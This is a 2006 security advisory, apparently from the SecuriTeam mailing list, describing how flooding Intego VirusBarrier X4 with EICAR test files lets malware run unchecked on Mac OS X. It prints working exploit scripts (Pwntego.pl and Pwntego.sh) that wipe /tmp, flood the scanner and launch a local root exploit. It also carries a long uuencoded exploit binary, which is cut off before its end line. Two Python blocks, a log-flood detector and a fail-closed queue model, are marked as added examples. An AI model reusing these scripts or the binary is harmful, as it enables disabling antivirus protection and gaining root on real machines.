[NEWS] Intego VirusBarrier X4 Definition Bypass (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 14 Nov 2006 15:31:39 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Intego VirusBarrier X4 Definition Bypass (Exploit)
------------------------------------------------------------------------
SUMMARY
Intego VirusBarrier X4 is "the simple, fast and non-intrusive antivirus
security solution for Macintosh computers, by Intego, the leading
publisher of personal security software for Macintosh. It offers thorough
protection against viruses of all types, coming from infected files or
applications, whether on CD-ROMs, DVDs or other removable media, or on
files downloaded over the Internet or other types of networks".
Although VirusBarrier does a pretty good job of halting malicious activity,
the product currently suffers from a flaw related to the number of alerts
it can process simultaneously. If an attacker is able to trigger multiple
alerts in succession within a very short amount of time, he or she may be
able to cause VirusBarrier to completely ignore positive matches against
virus definitions. The consequences of ignored matches may include full
system compromise or further spreading of malware.
DETAILS
As an example we will first show how VirusBarrier normally stops a local
root exploit with behavior similar to 'OSX.ExploitMachex.A', then we will
demonstrate how the VirusBarrier protection can be bypassed with a simple
flood of EICAR test files.
Any typical attempt to access or execute a file or program that matches a
VirusBarrier definition results in an alert in the user interface: a
sweet-looking insulin bottle on the screen slowly empties as the virus nears
eradication.
'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do
('Ignore' || 'Repair')?
Selecting 'Ignore' allows the malicious code to execute as if no antivirus
program were installed at all.
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),
79(appserverusr), 80(admin)
If, on the other hand, you choose 'Repair', the process is stopped dead in
its tracks and the file is nulled out:
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit
-rwxr-xr-x 1 virusbar wheel 0 Oct 31 02:02 excploit
The above output demonstrates how VirusBarrier is supposed to work. Under
normal circumstances this would be adequate to stop a malicious attack.
If, however, an attacker floods the file system with dummy virus files at a
quick rate, the VirusBarrier software promptly stops responding after
presenting the user with a few audible and visual alerts. After about 40-odd
infected files in a row the system becomes confused, and in some cases
VirusBarrier may stop responding completely. (Intego confirmed a limit of
20 files.)
When under attack the user may see dozens of messages on the screen. With
our example code the messages are similar to the following:
'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?
From the attacker's standpoint the exploitation is fairly quick and simple.
Our example uses a local root exploit; however, this tactic could easily be
applied to any existing malware technique that Intego VirusBarrier protects
against. Code could in theory be run as a precursor to an InqTana attack as
a means to bypass the Intego protection. The existing signatures for InqTana
A, B, C and D would then be completely useless and an E variant would be
born.
virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl Pwntego.sh README.txt pwntego.uu
rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p; P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;
P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel),
81(appserveradm), 79(appserverusr), 80(admin)
rm: /tmp/objc_sharing_ppc_92: Permission denied
In the above example 'OSX.ExploitMachex.A' is executed on a machine that is
actively protected by VirusBarrier. In a matter of seconds the Intego engine
is flooded and the attacker is able to bypass every Intego virus and malware
definition.
One fun side effect of this attack is that the user must manually dismiss a
number of alerts: the user is forced either to wait for each alert to time
out on its own after several seconds or to respond to each one
individually.
This attack has a fairly obvious signature in syslog if the attacker is
making use of the example code provided in this text. Obviously, using
random viruses and better-randomized locations and names is a possible
vector for a crafty attacker.
virusbarrier-users-ibook:/var/log root# tail -n 30 /var/log/vbmgvx.log
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261 by EICAR Test
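The "obvious signature" the text refers to is the rate of detections rather than any one name, so a defender watching vbmgvx.log can flag the flood without knowing which sample was used. The following detector is an added example, not part of the advisory or of Intego's software. It parses the log format shown above (the sample entries are the advisory's own, re-joined onto single lines), then looks for any 5-second window holding 10 or more detections; both numbers are assumed tuning values, not figures from the text.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# The advisory's /var/log/vbmgvx.log excerpt, re-joined onto single lines (the
# mailing-list copy wraps each entry). Format: "<ctime> - File infected: <path> by <signature>".
SAMPLE_LOG = """\
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261 by EICAR Test
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) - "
    r"File infected: (?P<path>.+) by (?P<sig>.+)$"
)


@dataclass(frozen=True)
class Detection:
    ts: datetime
    path: str
    signature: str


@dataclass
class Burst:
    start: datetime
    end: datetime
    detections: list = field(default_factory=list)

    @property
    def signatures(self):
        return Counter(d.signature for d in self.detections)


def parse_line(line):
    """Parse one detection entry; returns None for any other kind of log line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return Detection(datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"), m["path"], m["sig"])


def parse_log(text):
    return [d for d in map(parse_line, text.splitlines()) if d is not None]


def find_bursts(detections, threshold=10, window=timedelta(seconds=5)):
    """Group detections into bursts: runs in which some window-long span holds
    at least `threshold` events. Rate-based, so it does not depend on which
    signature fired (an attacker can swap EICAR for anything else detected)."""
    events = sorted(detections, key=lambda d: d.ts)
    flagged = [False] * len(events)
    j = 0
    for i in range(len(events)):
        # advance j to the first event outside the window that starts at events[i]
        while j < len(events) and events[j].ts - events[i].ts <= window:
            j += 1
        if j - i >= threshold:
            flagged[i:j] = [True] * (j - i)
    bursts, current = [], None
    for ev, hit in zip(events, flagged):
        if not hit:
            current = None
            continue
        if current is None:
            current = Burst(ev.ts, ev.ts)
            bursts.append(current)
        current.end = ev.ts
        current.detections.append(ev)
    return bursts


if __name__ == "__main__":
    for b in find_bursts(parse_log(SAMPLE_LOG)):
        print(f"ALERT FLOOD {b.start:%H:%M:%S}-{b.end:%H:%M:%S}: "
              f"{len(b.detections)} detections, signatures={dict(b.signatures)}")
```

Run against the excerpt, the single 'OSX.ExploitMachex.A' hit at 02:01:59 stays below the threshold while the twenty EICAR hits between 02:03:35 and 02:03:38 form one burst; a burst of twenty detections from one directory in three seconds is what an operator would page on, whatever the signature names say.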
With the current fixes in place, once VirusBarrier has 19 alerts pending,
any further malware is simply quarantined until the administrator can
repair it. In our example, the additional processes get a permission error
when they are executed.
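The fix described above is a fail-closed design: when the alert queue is saturated the engine blocks what it cannot show instead of letting it run. The model below is an added example, not Intego's code; the 19-slot capacity is the figure given in the text, and the decoy file names are constructed. It replays the advisory's sequence (a burst of decoy detections followed by the real payload) under both policies.

```python
from dataclasses import dataclass, field
from enum import Enum


class Verdict(Enum):
    PROMPT = "ask the user: Ignore or Repair"
    IGNORED = "dropped: the file is allowed to run"                # pre-fix failure mode
    QUARANTINED = "quarantined until an administrator repairs it"  # fixed behaviour


@dataclass
class AlertQueue:
    """Model of a bounded queue of pending on-screen alerts.

    capacity: pending alerts the UI holds before it saturates (19 per the advisory).
    fail_closed: what the engine does with a detection it cannot display.
    """
    capacity: int = 19
    fail_closed: bool = True
    pending: list = field(default_factory=list)
    quarantined: list = field(default_factory=list)
    ignored: list = field(default_factory=list)

    def on_detection(self, path):
        if len(self.pending) < self.capacity:
            self.pending.append(path)
            return Verdict.PROMPT
        # Queue is full. The attacker controls how many detections arrive and
        # how fast, so the only safe default here is to block.
        if self.fail_closed:
            self.quarantined.append(path)
            return Verdict.QUARANTINED
        self.ignored.append(path)
        return Verdict.IGNORED

    def user_answers(self, path):
        """The user clicks Ignore or Repair on one alert, freeing its slot."""
        self.pending.remove(path)


def simulate(fail_closed, decoys=40, payload="/private/tmp/excploit"):
    """Replay the advisory's sequence: `decoys` detections in a burst
    (constructed names), then the real payload. Returns the payload's verdict."""
    q = AlertQueue(fail_closed=fail_closed)
    for n in range(decoys):
        q.on_detection(f"/private/tmp/decoy-{n}")
    return q.on_detection(payload)


if __name__ == "__main__":
    for policy in (False, True):
        print(f"fail_closed={policy}: payload -> {simulate(policy).value}")
```

With `fail_closed=False` the 41st detection (the payload) is silently dropped, which is the behaviour the session output above shows; with `fail_closed=True` it is quarantined, matching the "Operation not permitted" the fixed version produces. The general lesson is that any detection pipeline with a human-in-the-loop queue needs an explicit overflow policy, and that policy must be deny.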
Of course, since everyone knows there is no malware for Macintosh, this
scenario would quite simply never be encountered... *smirk*
The Intego staff were more than helpful and willing to address this issue
in a timely fashion. After communications were established the problem was
addressed, and fixes were out the door to customers within 2 days. How
about that for turnaround time!
Workaround:
Please update to the latest version of Intego VirusBarrier and the latest
Vdefs: http://www.intego.com/services/updates.asp?product=VirusBarrier
Intego has fixed this bug in the 2006/11/01 Vdef files.
Exploits:
Pwntego.pl
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# If you are lucky this *may* bring VirusBarrier to 100% CPU usage also.
# It sounds like my mac mini is gonna fucking launch off my desk. heh!
system("rm -rf /tmp/* > /dev/null");
for($i =0; $i <= 40; $i=$i+1) # Is 40 the magic virus limit for Intego??
{
system("./rand-eicar.pl&");
# sleep 1;
}
printf("\n");
printf("Injecting pwnacillin shot\n");
system("uudecode pwntego.uu;chmod +x pwntego; rm -rf /tmp/sh; cp -rf /usr/bin/id /tmp/sh; ./pwntego");
system("rm -rf /tmp/* > /dev/null");
Pwntego.sh
#!/bin/sh
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
rm -rf /tmp/*
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
uudecode pwntego.uu
chmod +x pwntego
rm -rf /tmp/sh
cp -rf /usr/bin/id /tmp/sh
/pwntego
rm -rf /tmp/*
pwntego.uu
begin 644 pwntego
M_NWZS@```!(``````````@````H```5$````A0````$````X7U]004=%6D52
M3P```````````````!`````````````````````````````````$`````0``
M`8Q?7U1%6%0````````````````0````$``````````0``````<````%````
M!0````!?7W1E>'0`````````````7U]415A4````````````````%K0```7X
M```&M`````(``````````(``!````````````%]?<&EC<WEM8F]L7W-T=6)?
M7U1%6%0````````````````<K`````````RL`````@``````````@```"```
M```````D7U]S>6UB;VQ?<W1U8@```%]?5$585````````````````!RL````
M````#*P````"``````````"````(`````````!1?7W!I8W-Y;6)O;'-T=6(Q
M7U]415A4````````````````'*P```*@```,K`````(``````````(``!`@`
M````````(%]?8W-T<FEN9P````````!?7U1%6%0````````````````?3```
M`+0```],`````@```````````````@```````````````0```=!?7T1!5$$`
M```````````````@````$````!`````0``````<````#````!@````!?7V1A
M=&$`````````````7U]$051!````````````````(`````"@```0``````(`
M`````````````````````````%]?;&%?<WEM8F]L7W!T<@!?7T1!5$$`````
M```````````@H````%0``!"@`````@``````````````!P```!4`````7U]N
M;%]S>6UB;VQ?<'1R`%]?1$%400```````````````"#T````&```$/0````"
M```````````````&````*@````!?7V1Y;&0`````````````7U]$051!````
M````````````(0P````<```1#`````(``````````````````````````%]?
M8G-S``````````````!?7T1!5$$````````````````A*````!``````````
M`P```````````````0``````````7U]C;VUM;VX``````````%]?1$%400``
M`````````````"%`````.``````````$```````````````!````````````
M```!````.%]?3$E.2T5$250``````````#`````0````(`````[8````!P``
M``$`````````!`````X````<````#"]U<W(O;&EB+V1Y;&0````````,````
M-````!A%(8IM`$<!!``!```O=7-R+VQI8B]L:6)3>7-T96TN0BYD>6QI8@``
M`````@```!@``"``````A@``)W0```=D````"P```%``````````5````%0`
M```7````:P```!L``````````````````````````````````":T````,```
M```````````````````````6````$```)D@````;````!0```+`````!````
M*```%K0`````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````?#H+>#@A__Q4(0`T.````)`!``"4(?_`@'H``#B:``0[8P`!5WL0
M.GRDVA1(```)?^``"'P(`J:_@?_PD`$`")0A_Z!"GP`%?^@"IGQ\&WA\G2-X
M?+XK>$@``;$\7P``DX()!#Q?``"3H@D(/%\``)/""0P\7P``@$(*`(&"```O
MC```0;X`#'V)`Z9.@`0A/%\``(!""?R!@@``+XP``$&^``Q]B0.F3H`$(4@`
M!8T\7P``@8()&(`,```O@```0;X`#'V)`Z9.@`0A2```]3Q?``"!@@D4@`P`
M`"^```!!O@`,?8D#IDZ`!"$\?P``.&,(5#B!`$!(``%E@&$`0"^#``!!O@`(
M2``%$3@````\7P``@$()^)`"``"!/0``?2)+>"^)``!!G@!D.4```#E@``"(
M"0``?``'="^```!!G@`P?`)8KGP`!W0O@``O0+X`"'U+$A0Y:P`!?2)+>'P)
M6*Y\``=T+X```$">_]@OB@``09X`##@*``%(```(@!T``#Q?``"0`@D0?\;S
M>(`>```O@```09X`$(0&``0O@```0)[_^'^#XWA_I.MX?\7S>#C&``1(``+5
M2``$/7P(`J:3X?_\D`$`")0A_Z!"GP`%?^@"ICQ_```X8P;@.($`0$@``'F!
M@0!`?8D#IDZ`!"&``0!H."$`8'P(`Z:#X?_\3H``(#U@``"!:R$,+(L``$&&
M``A.@``@.*``3CB```!@A!^8.&```C@```1$```".&``.S@```%$```"?^``
M"#V```"`#"$,?`D#ICV```!AC!``3H`$(#U@``"!:R$0?6D#IDZ`!"!\"`*F
MOZ'_])`!``B4(?^@?#X+>)!^`'B0G@!\.&```3B``"A(``2I?&`;>)`>`$"`
M7@!`@!X`>)`"``2`7@!`@!X`?)`"``B`7@!`.```*)`"``"#O@!`.&`!+4@`
M!%&0?0`0.&`!+8">`$!(``0A@"$``(`!``A\"`.FNZ'_]$Z``"!\"`*FO\'_
M^)`!``B4(?^@?#X+>)!^`'B0G@!\.````)`>`$@X8`$M2``$`9!^`$`X'@!`
MD!X`1(!>`$2``@``+X```$">``A(``!X@%X`1(!"``"`0@`$@!X`>'^"``!`
MG@!,@%X`1(!"``"`0@`(@!X`?'^"``!`G@`T@%X`1(`"``"0'@!(@3X`1(!>
M`$B``@`0D`D``(!>`$B``@``+X``*$&>`!Q(``-!@%X`1(!"```X`@`0D!X`
M1$O__WPX8`$M@)X`0$@``T&`'@!(+X```$&>`#2`7@!(@`(`#"^```!!G@`<
M@%X`2(`"``R`?@!(?`P#>'V)`Z9.@`0A@'X`2$@``L6`(0``@`$`"'P(`Z:[
MP?_X3H``('P(`J:_P?_XD`$`")0A_Z!\/@MX0I\`!7_H`J9(``)Q/%\``(!"
M!BB``@`(D!X`0(`>`$`O@```09X`'(!>`$"@`@`$5``$/BN```)`G0`(2```
M'#Q?``"`8@5$2``"$3Q?``"`8@5`2``!Y8`A``"``0`(?`@#IKO!__A.@``@
M?`@"IK_!__B0`0`(E"'_H'P^"WA"GP`%?^@"ICQ?``"`0@6P@`(``)`>`$`X
M'@!$@'X`0#B```%\!0-X2``#L8!^`$"`G@!$@+X`1#C``!1(``-]@'X`0#B`
M``*`O@!$.,```SC@``%(``-%2``#(7Q@&W@O@```09X`*#Q?``"`8@6L.(`"
M`("^`$0XP```2``"W3A@``!(``*U2```+#A@``,\GP``.(0%T$@``H$\?P``
M.&,$D#R?```XA`2@.*```$@``DDX````?`,#>(`A``"``0`(?`@#IKO!__A.
M@``@?`@"IK_!__B0`0`(E"'_L'P^"WA"GP`%?^@"II!^`&B0G@!LD+X`<)#>
M`'20_@!XD1X`?)$^`("17@"$@'X`<(">`(PXH`"`.,```4@``;V`7@",@'X`
M<(""```\OP``.*4#Y#C``(!(``&!.````'P#`WB`(0``@`$`"'P(`Z:[P?_X
M3H``('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#['V)`Z9.@`0@?`@"ID*?``5]
M:`*F/6L``'P(`Z:%BP/0?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+
M`[1]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#F'V)`Z9.@`0@?`@"
MID*?``5]:`*F/6L``'P(`Z:%BP-\?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``
M?`@#IH6+`V!]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#1'V)`Z9.
M@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP,H?8D#IDZ`!"!\"`*F0I\`!7UH
M`J8]:P``?`@#IH6+`PQ]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L"
M\'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP+4?8D#IDZ`!"!\"`*F
M0I\`!7UH`J8]:P``?`@#IH6+`KA]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\
M"`.FA8L"G'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP*`?8D#IDZ`
M!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`F1]B0.F3H`$('P(`J9"GP`%?6@"
MICUK``!\"`.FA8L"2'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP(L
M?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`A!]B0.F3H`$('P(`J9"
MGP`%?6@"ICUK``!\"`.FA8L!]'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(
M`Z:%BP'8?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`;Q]B0.F3H`$
M(`````!?7V1Y;&1?;6]D7W1E<FU?9G5N8W,```!?7V1Y;&1?;6%K95]D96QA
M>65D7VUO9'5L95]I;FET:6%L:7IE<E]C86QL<P````!4:&4@:V5R;F5L('-U
M<'!O<G0@9F]R('1H92!D>6YA;6EC(&QI;FME<B!I<R!N;W0@<')E<V5N="!T
M;R!R=6X@=&AI<R!P<F]G<F%M+@H``"]U<W(O8FEN+V-H<V@```!C:'-H````
M````````````````````'TP``"%$```:P```&:0``!D@2```%0``````$```
M```````0``!\J`*F.&```SB%```X``##1````F`````X8```.```%T0```)@
M````.&```#@``+5$```"8````#AE`&@XA0!TD&0``#@``#M$```"8````#@`
M``%$```"+R\O+W1M<"]S:````````````````!CX```8^```&/@``!CX```8
M^```&/@``!CX```8^```&/@``!CX```8^```&/@``!CX```8^```&/@``!CX
M```8^```&/@``!CX```8^```&/@`````````````````````````````````
M````````````````````````````&/@`````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````0:9`$`````%K0```0B@`````````````1$@`````````````169`$`
M````%N@```179`$`````%N@```1P9`$`````%N@```2./`````````````2=
M#@8`````(!````2R#@8`````(!0`````1`$`L@``%N@`````1`$`O0``%PP`
M````1`$`P```%Q``````1`$`P0``%Q@`````1`$`P@``%R``````1`$`Q```
M%R@`````1`$`Q0``%SP`````1`$`Q@``%T0`````1`$`QP``%U@`````1`$`
MR@``%V``````1`$`SP``%V0`````1`$`T```%W@`````1`$`V0``%X``````
M1`$`W0``%X0`````1`$`W@``%Y@`````1`$`ZP``%Z``````1`$`[```%[``
M````1`$`[0``%[P`````1`$`\```%\``````1`$`\@``%]``````1`$`\P``
M%^``````1`$`]```%^0`````1`$`]0``%_@`````1`$`]@``&`@`````1`$`
M]```&`P`````1`$`^```&"0`````1`$`^0``&"P`````1`$`^P``�`````
M1`$!!@``&$``````1`$!"P``&%P`````1`$!#```&'0```3B)`$`L@``%N@`
M``3V@`````````````4"0```KP```!P```4M0```L````!T```550```L0``
M`!X```5A@`````````````5L@`````````````5X0```LP````L```6!0```
MM`````H```6*0```M@````8```63@```N0```$````6LP`$`````%PP```6M
MX`$`````&'0```6N)````````8P```6O#@$`````&'0`````1`$!)@``&'0`
M````1`$!*0``&(P`````1`$!*P``&)P`````1`$!+```&*@```7%)`$!)@``
M&'0```7A@``!)P```$````7IP`$`````&(P```7JX`$`````&+P```7K)```
M`````$@```7L(```+0````````7Z(```+@````````8((```+P````````87
M(```,`````````8I(```;@````````90(```;P````````9M)@8`=0``(!``
M``:()@8`>@``(!0```:^9`$`````&+P```:_#@D`````(0P```;D#@4`````
M'Y@```;R#@D`````(1`````@'@$`````&1`````S'@$`````&+P```!%'@$`
M````%N@```!6'@$`````&/@```<+#@$`````&2````<N#@$`````&:0```=4
M#@H`````(2@```=:#@8`````("`````$#P8`$```(``````,#P8`$```(`0`
M``!U#P$`````&L`````4#P8`$```(`P```"^#PL`````(4````#B`P``$```
M$`````#V#PL`````(40```$)#PL`$```(4@```$@#PL`$```(4P```$]#P$`
M$```'"0```%C#PL`$```(5````%V#PL`$```(50```&0#PL`$```(5@```&K
M#PL`$```(5P```'(#PL`$```(6````'B#PL`$```(60```(##PL`$```(6@`
M``(E#PL`$```(6P```))#PL`$```(7````!-#P8`$```(`@```**#P$`````
M&T````*0#PL`$```(70```!O#P$`````%K0```";`0`!`0````````*A`0`!
M``````````#+`0`!``````````*R`0`!`0````````+5`0`!`0````````+[
M`0`!`0````````,)`0`!`0````````,O`0`!`0````````-7`0`!`0``````
M``$!`0`!`0````````->`0`!`0````````)J`0`!``````````-L`0`!````
M``````-X`0`!`0````````)Q`0`!`0````````-_`0`!`0````````-F`0`!
M`0````````)W`0`!``````````.%`0`!`0````````.;`0`!`0````````.O
M`0`!`0````````/'`0`!``````````/8`0`!`0````````/C`0`!`0``````
M``/]`0`!`0````````0*`0`!`0````````04`0`!`0````````%?```!8```
M`>,```((```""@```A@```(:```"'@```R<```-N```#J```!*,```2N```$
MM```!+H```4,```%'```!Q<```<C```'*@``!S@```=(```)MP``"M````M3
